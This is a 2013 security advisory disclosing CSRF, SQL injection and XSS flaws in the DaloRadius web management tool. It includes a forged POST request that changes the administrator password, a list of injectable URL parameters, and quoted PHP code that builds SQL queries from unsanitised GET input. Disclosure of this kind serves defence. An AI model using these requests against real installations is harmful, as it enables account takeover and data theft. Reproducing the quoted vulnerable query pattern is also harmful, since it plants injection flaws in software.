------------------------------------------------------------------------- # Software : DaloRadius SQLi / CSRF / XSS # Author : Saadat Ullah , saadi_linux@rocketmail.com # Author home : http://security-geeks.blogspot.com # Date : 15/3/13 # Vendors : http://www.daloradius.com/ # Download Link : http://sourceforge.net/projects/daloradius/ ------------------------------------------------------------------------- +---+[ CSRF Change Admin Password ]+---+ DaloRadius Is not Using Any Security Tokens To Protect Againts CRSF.It is vuln to CRSF on All Locations. Some OF them.. Change Admin Password





Poc Header Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://localhost/daloradius/config-operators-edit.php?operator_username=administrator Cookie: PHPSESSID=5f528764d624db129645be2e9 Content-Type: application/x-www-form-urlencoded Content-Length: 3540 Post Data: operator_username=administrator&password=radius1&submit=Apply +---+[ SQL Injection ]+---+ Their are multiple SQLI in the script some are.. http://localhost/daloradius/acct-ipaddress.php?orderBy=[SQLi] http://localhost/daloradius/acct-ipaddress.php?ipaddress=[SQLi] http://localhost/daloradius/acct-date.php?orderBy=[SQLi] http://localhost/daloradius/acct-date.php?username=[SQLi] etc Proof Of Concept in acct-ipaddress.php isset($_GET['orderBy']) ? $orderBy = $_GET['orderBy'] : $orderBy = "radacctid"; isset($_GET['orderType']) ? $orderType = $_GET['orderType'] : $orderType = "asc"; isset($_GET['ipaddress']) ? $ipaddress = $_GET['ipaddress'] : $ipaddress = ""; . . . $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, radacct.FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, radacct.AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE FramedIPAddress='$ipaddress';"; In acct-date.php if ( (isset($_GET['username'])) && ($_GET['username']) ) { $username = $_GET['username']; $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, ".$configValues['CONFIG_DB_TBL_RADACCT'].".FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE AcctStartTime>'$startdate' and AcctStartTime<'$enddate' and UserName like '$username';"; +---+[ XSS ]+---+ http://localhost/daloradius/rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter= http://localhost/daloradius/mng-search.php?username= #Independent Pakistani Security Researcher